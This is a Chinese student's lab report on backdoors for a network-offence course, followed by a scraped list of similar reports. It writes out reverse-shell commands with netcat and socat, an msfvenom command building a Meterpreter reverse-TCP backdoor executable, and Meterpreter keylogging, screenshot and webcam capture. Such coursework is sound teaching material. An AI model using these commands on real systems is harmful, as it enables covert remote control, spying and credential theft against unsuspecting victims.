20145207《网络对抗》MAL后门原理与实践

基础问题回答

(1)例举一个后门进入到你系统中的可能方式?

下载软件,淘宝虚假链接,买卖账号时侵入的黑客

(2)例举一个后门启动起来(win及linux)的方式?

软件伪装的方式来让他人在不知情况下点进去,

(3)Meterpreter有哪些给你映像深刻的功能?

获得摄像头控制权,获得system权限,得到密码

(4)如何发现自己有系统有没有被安装后门?

杀毒软件算不算(尴尬)

实验总结与体会

开始感觉屌屌的,虽然确实可以盗取获得一些东西,摄像权密码之类的,虽然很厉害,很能拿出去装x。但是要求条件好苛刻,需要关人家防火墙,还得跟人家桥接,同一网段还得知道ip。瞬间感觉好智障,人家怎么会那样让你侵入。。

实践一:ncat

知识要求:

1.NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection);
2.netcat实现简单服务器命令:nc -l -p //-l表明nc处于监听模式,-p指定端口号;
3.nc的-e选项,指定连接后执行的程序。
windows获得linux shell
  • windows作为攻击端开启监听模式ncat.exe -l -p 5207
  • linux反弹连接并且设置连接后启动shell。nc 172.30.202 5207 -e /bin/sh

linux获得windows shell。

相反的步骤,在windows下进行即可。

ncat文件传输

1、监听端windows命令:ncat.exe -lv port > filename

2、传输端kali命令:nc windows_ip port < filename

结果如下(传输的文件在ncat文件夹下):

cron启动

命令:crontab -e修改文件,crontab -l查看修改的文件。

实践二:socat

windows获得kali shell

1、kali设置监听命令socat tcp-l:5207 system:bash,pty,stderr

2、windows连接,并获取权限socat readline tcp:172.30.1.181 5207

结果:

kali获得window shell

1、windows端如下图:

2、kali端意思一样的,忘了截了。

实践三:

1、生成后门程序命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=linux_ip LPORT=444 -f exe >20145207.exe

2、在windows端运行后门程序,并获得权限如下图所示:

实践四

1.获取目标主机当前屏幕界面

(破虚拟机卡的我差点重写)

2.获取键盘内容。keyscan_start为开始获取目标主机键盘输入内容,keyscan_dump为结束获取目的主机键盘内容,输入之后会显示键盘的输入内容

3.获取目标主机摄像头记录

20145207《网络对抗》MAL后门原理与实践的更多相关文章

  1. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  2. 20145204《网络对抗》MAL后门原理与实践

    20145204<网络对抗>MAL后门原理与实践 实践内容说明 (1)使用netcat获取主机操作Shell,cron启动 (1分) (2)使用socat获取主机操作Shell, 任务计划 ...

  3. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  4. 20155302 Exp2 后门原理与实践

    20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...

  5. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  6. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  7. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  8. 20165221 《网络对抗技术》EXP2:后门原理与实践

    20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shel ...

  9. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

随机推荐

  1. lua-excel助手

    excel是我们工作及生活当中不可或缺的东西,好吧,我是一个游戏程序员,数值哥哥肯定会给我些表格的.回归正题,为什么需要做这个封装? 为什么需要这个项目,因为我们需要使用程序进行自动化操作 VBA我们 ...

  2. Java中父类强制转换为子类的可能

    之前徒弟问了一个问题, 在Java中, 父类对象到底能不能转换成对应的子类对象? 到底能不能, 今天就来说说这个问题, 先看下面一段代码: package cn.com.hanbinit.test; ...

  3. MATLAB入门学习(五)

    现在,我们来学画图吧.╭( ・ㅂ・)و ̑̑ 绘制函数图像最常用的命令是plot plot(x,y,s)x,y为同维向量,绘制分别以x为横坐标,y为纵坐标的曲线 如果x y 是矩阵的话则会绘制多条曲线 ...

  4. hdu-2841 Visible Trees---容斥定理

    题目链接: http://acm.hdu.edu.cn/showproblem.php?pid=2841 题目大意: N*M的格点上有树,从0,0点可以看到多少棵树. 解题思路: 发现如果A1/B1= ...

  5. Intellij IDEA Organize Imports

    使用Eclipse进行开发时,我喜欢用Ctrl + Shift + O快捷键管理Java类的导入,它可以导入所需的Java类,去除不需要的Java类. Eclipse的Organize Imports ...

  6. PHP----练习----光标离开文本框时变色

    题目::创建若干个输入文本框,当光标离开文本框的时候如果文本框为空,则将文本框背景色设置为红色,如果不为空则为白色. <!DOCTYPE html PUBLIC "-//W3C//DT ...

  7. 全渠道价值链整合云服务 B2B SOLOMO(组图)

    最近看到>中谈到“全渠道零售”(Omni-channel Retailing),指在互联网和电子商务的当今时代“零售商将能通过各种渠道与顾客互动,包括网站.实体店.服务终端.直邮和目录.呼叫中心 ...

  8. mysql update 子查询锁表问题

    mysql在Update带有子查询的时候,子查询的表会锁住,导致该表无法使用.比如 update A set comments = (select count(1) from B where id = ...

  9. windows用交互式命令执行python程序

    1.进入cmd命令 windows+r2.进入盘符,eg:E:3.使用dir命令查看当前文件夹下的所有目录4.使用绝对路径或者相对路径和cd命令直接进入想要到达的文件夹目录(或者使用cd命令一步一步达 ...

  10. chromium之message_pump_win之三

    上一篇分析MessagePumpForUI,参考chromium之message_pump_win之二 MessagePumpForIO,同MessagePumpForUI,也是要实现三个函数 // ...